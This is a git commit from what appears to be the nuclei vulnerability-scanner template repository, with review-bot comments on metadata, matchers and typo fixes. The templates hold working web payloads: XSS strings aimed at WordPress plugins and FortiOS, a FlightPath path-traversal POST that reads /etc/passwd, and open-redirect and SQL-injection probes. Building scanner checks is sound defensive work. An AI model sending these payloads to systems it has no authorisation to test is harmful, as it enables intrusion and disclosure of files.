Merge remote-tracking branch 'upstream/master'
commit 009bccc5f2
@ -0,0 +1,30 @@
|
|||
name: 📑 Template-DB Indexer
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
cd nucleish-api/cmd/generate-index/
|
||||
go install
|
||||
|
||||
- name: Generate Index
|
||||
env:
|
||||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
|
||||
generate-index -mode changelog
|
|
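Review bot: the `git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github` line in the Intalling Indexer step writes the token into the runner's global git config, where it stays readable to every later step and to anything `go install` pulls in; scope it to the one clone on the next line and remove it afterwards. Also in this step: the name has a typo (`Intalling` should be `Installing`), `nucleish-api` is cloned from its default branch with no ref pinned so the indexer can change under the workflow, and `go-version: 1.17` is better quoted so YAML keeps it a string.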
@ -7,10 +7,9 @@
|
|||
# tags is a list of tags to ignore execution for
|
||||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
|
|
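Review bot: the hunk shows `tags:` twice with one line removed (-7,10 +7,9), so it reads as a duplicate-key or indentation fix in the ignore list; the rendered diff drops leading whitespace, so check the resulting file directly that `tags:` is the single top-level key and `- "fuzz"`, `- "dos"`, `- "misc"` are indented under it, since a repeated top-level `tags:` makes the YAML ambiguous.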
@ -60,7 +60,7 @@ git add .
|
|||
git commit -m "Added/Fixed/Updated XXX Template"
|
||||
```
|
||||
|
||||
**NOTE**:
|
||||
**NOTE**:
|
||||
|
||||
- A Pull Request should have only one unique template to make it simple for review.
|
||||
- Multiple templates for same technology can be grouped into single Pull Request.
|
||||
|
|
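Review bot: whitespace-only change to `**NOTE**:`; while here, the bullet `Multiple templates for same technology can be grouped into single Pull Request` wants articles: `for the same technology` and `into a single Pull Request`.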
README.md
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
|
||||
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
|
||||
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
|
||||
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
|
||||
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
||||
**203 directories, 3004 files**.
|
||||
**212 directories, 3054 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
(File diff suppressed because one or more lines are too long)
TEMPLATES-STATS.md (file diff suppressed because it is too large)
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
|
||||
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
|
||||
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
|
||||
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
|
||||
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
|
|
@ -4,9 +4,14 @@ info:
|
|||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
remediation: There is currently no patch available.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 6.5
|
||||
cwe-id: CWE-276
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
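Review bot: the added `cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` does not fit the description: the vector says adjacent-network access with no integrity impact, while the text says attackers reach the installation page and reinstall the system, which is a network-reachable integrity problem; check the vector and the 6.5 score against the CNVD reference before committing them. The rewritten description also drops the root cause the old one stated (the installation directory is not protected or filtered after install), which is worth keeping, and `cwe-id: CWE-276` should be confirmed for the same reason.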
@ -27,3 +32,5 @@ requests:
|
|||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/01/26
|
||||
|
|
|
@ -643,7 +643,7 @@
|
|||
"author": "forgedhallpass",
|
||||
"links": {
|
||||
"github": "https://www.github.com/forgedhallpass",
|
||||
"twitter": "",
|
||||
"twitter": "https://twitter.com/forgedhallpass",
|
||||
"linkedin": "",
|
||||
"website": "",
|
||||
"email": ""
|
||||
|
|
|
@ -5,10 +5,13 @@ info:
|
|||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
tags: cve,cve2000,frontpage,microsoft
|
||||
classification:
|
||||
cve-id: CVE-2000-0114
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
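Review bot: the new `classification:` block carries only `cve-id: CVE-2000-0114`; the other templates enhanced in this commit also add `cvss-metrics`, `cvss-score` and `cwe-id`, so fill those in for consistency. `remediation: Upgrade to the latest version.` is generic for a FrontPage Server Extensions issue from 2000; naming the fixed release or advising removal of the `/_vti_bin/` virtual directory would be more useful.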
@ -24,4 +27,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
||||
- "_vti_bin/shtml.dll"
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
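Review bot: the body matcher `- "_vti_bin/shtml.dll"` looks for the same string that is in the request path, so any server that echoes the requested URL in its 404 or error page will match; pair it with a status matcher or with a string that only the real shtml.dll response returns (the description says the anonymous account name is disclosed, which is the stronger signal).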
@ -4,9 +4,14 @@ info:
|
|||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||
reference: https://www.exploit-db.com/exploits/24068
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/24068
|
||||
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
|
||||
tags: xss,squirrelmail,cve2004,cve
|
||||
classification:
|
||||
cve-id: CVE-2004-0519
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
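Review bot: the second reference `ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc` is an FTP URL that most clients and link checkers will not fetch; replace it with an HTTPS mirror or drop it. The rewritten description also drops `as other users` from the original sentence, which was the part that made this an XSS impact statement rather than self-XSS.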
@ -28,3 +33,7 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
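Review bot: the `# Enhanced by mp on 2022/01/27` trailer is added twice in this hunk (+4 lines: blank, comment, blank, comment); keep one.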
@ -4,11 +4,14 @@ info:
|
|||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
classification:
|
||||
cve-id: CVE-2008-6172
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
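Review bot: good catch: `import–legacy–media` used U+2013 EN DASH where the plugin slug has ASCII hyphens, so the old path could never hit the real file; the same fix is applied below to `podcast–channels`, `shortcode–ninja`, `swipehq–payment–gateway–woocommerce`, `ultimate–weather–plugin` and `wp–planet`. A lint rule rejecting non-ASCII characters in `path:` entries would stop this class of typo from recurring.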
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -34,4 +34,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
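Review bot: the path still ends with a space inside the quotes (`...%3C/script%3E "`), in both the old and the new line; it is sent as part of the request target, so trim it while touching this line.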
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -34,4 +34,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
|
@ -5,16 +5,19 @@ info:
|
|||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
|
||||
remediation: Upgrade to a supported version of Gog.
|
||||
reference:
|
||||
- http://www.securityfocus.com/bid/71187
|
||||
- http://seclists.org/fulldisclosure/2014/Nov/33
|
||||
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
|
||||
- http://gogs.io/docs/intro/change_log.html
|
||||
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
|
||||
- http://www.exploit-db.com/exploits/35238
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
|
||||
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
|
||||
tags: cve,cve2014,sqli,gogs
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id: CVE-2014-8682
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
shodan-query: 'title:"Sign In - Gogs"'
|
||||
|
||||
|
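Review bot: `remediation: Upgrade to a supported version of Gog.` misspells the product; it should be `Gogs`. The reference list is also all `http://` apart from the GitHub commit; where the sites serve HTTPS (securityfocus, seclists, packetstorm, exploit-db, gogs.io) use it.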
@ -34,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/01
|
||||
|
|
|
@ -30,3 +30,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
|
||||
|
|
|
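Review bot: adding `- 500` to the status matcher widens what counts as a hit; a 500 is also what a WAF or an unrelated crash returns, so this is only safe if `matchers-condition: and` pairs it with a body or header match, which is not visible in this hunk and should be checked. The same applies to the identical `- 500` addition further down.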
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-3978
|
||||
|
||||
info:
|
||||
name: FortiOS (Fortinet) - Open Redirect and XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
|
||||
reference:
|
||||
- https://seclists.org/fulldisclosure/2016/Mar/68
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
|
||||
tags: cve,cve2016,redirect,fortinet,fortios
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2016-3978
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login?redir=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
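Review bot: the description says the vulnerable parameter is `redirect` on `login`, but the request uses `/login?redir=http://www.example.com`; confirm the parameter name against the seclists reference. The template also has only the Location regex and no status matcher, unlike CVE-2021-24838 in this same commit which adds `- 302`, and `cwe-id: CWE-79` is the XSS CWE while the other open-redirect templates here use CWE-601; the description lists both impacts, so pick deliberately.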
@ -3,7 +3,7 @@ info:
|
|||
author: Random_Robbie
|
||||
name: Apache Struts2 RCE
|
||||
severity: critical
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
tags: cve,cve2017,struts,rce,apache
|
||||
reference: https://github.com/mazen160/struts-pwn
|
||||
classification:
|
||||
|
@ -25,4 +25,4 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "X-Hacker: Bounty Plz"
|
||||
part: header
|
||||
part: header
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2017-7391
|
||||
|
||||
info:
|
||||
name: Magmi – Cross-Site Scripting v.0.7.22
|
||||
name: Magmi Cross-Site Scripting v.0.7.22
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||||
|
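Review bot: with the dash gone the name reads `Magmi Cross-Site Scripting v.0.7.22`, which puts the version after the vulnerability class; the convention elsewhere on this page is product, version, hyphen, class (`Smartstore < 4.1.0 - Open redirect`, `Cacti v1.2.8 - Unauthenticated Remote Code Execution`), so `Magmi 0.7.22 - Cross-Site Scripting`.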
@ -25,12 +25,13 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
|
||||
reference:
|
||||
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||
|
|
|
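Review bot: the second reference URL is titled `lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839`, a different CVE id from this template's CVE-2018-10818; confirm it is the intended source or replace it with a CVE-2018-10818 advisory. The description is also written in the second person (`You cannot simply log in...`); a neutral statement of the flaw reads better in a template.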
@ -4,7 +4,7 @@ info:
|
|||
name: D-Link Routers - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
|
||||
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45678
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
|
||||
|
|
|
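Review bot: the quote fix is fine; the model list still has inconsistent spacing (`DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921`), so add the missing spaces after the commas while touching this line.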
@ -10,7 +10,7 @@ info:
|
|||
caused by improper neutralization of special elements.
|
||||
An unauthenticated remote malicious user (or attacker) can supply
|
||||
specially crafted request parameters against Spring Data REST backed HTTP resources
|
||||
or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
|
||||
tags: cve,cve2018,vmware,rce,spring
|
||||
classification:
|
||||
|
|
|
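Review bot: the line still reads `request payload binding hat can lead to` after the apostrophe fix; `hat` should be `that`.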
@ -2,34 +2,38 @@ id: CVE-2018-13380
|
|||
|
||||
info:
|
||||
name: Fortinet FortiOS Cross-Site Scripting
|
||||
author: shelld3v
|
||||
author: shelld3v,AaronChen0
|
||||
severity: medium
|
||||
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2018-13380
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
|
||||
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
||||
- "<script>alert(1337)</script>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
negative: true
|
||||
|
||||
- type: status
|
||||
|
|
|
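Review bot: the two `/message?title=x&msg=...` paths differ only by a trailing `%3B`; if the second is needed for a firmware variant, say so in a comment, otherwise it doubles the requests for nothing. The new `negative: true` on the `application/json` header matcher also passes when no Content-Type header is present at all, so it does not by itself establish an HTML response; the positive `text/html` header match used by other templates in this commit is the stricter check.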
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-17254
|
||||
|
||||
info:
|
||||
name: Joomla JCK Editor SQL Injection
|
||||
name: Joomla! JCK Editor SQL Injection
|
||||
author: Suman_Kar
|
||||
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
|
||||
severity: critical
|
||||
|
@ -27,3 +27,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "nuclei-template"
|
||||
|
||||
# Enhanced by cs on 2022/02/01
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2019-13396
|
||||
info:
|
||||
name: FlightPath Local File Inclusion
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: high
|
||||
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47121
|
||||
- https://www.cvedetails.com/cve/CVE-2019-13396/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2019-13396
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2019,flightpath,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: token
|
||||
part: body
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- "idden' name='form_token' value='([a-z0-9]+)'>"
|
|
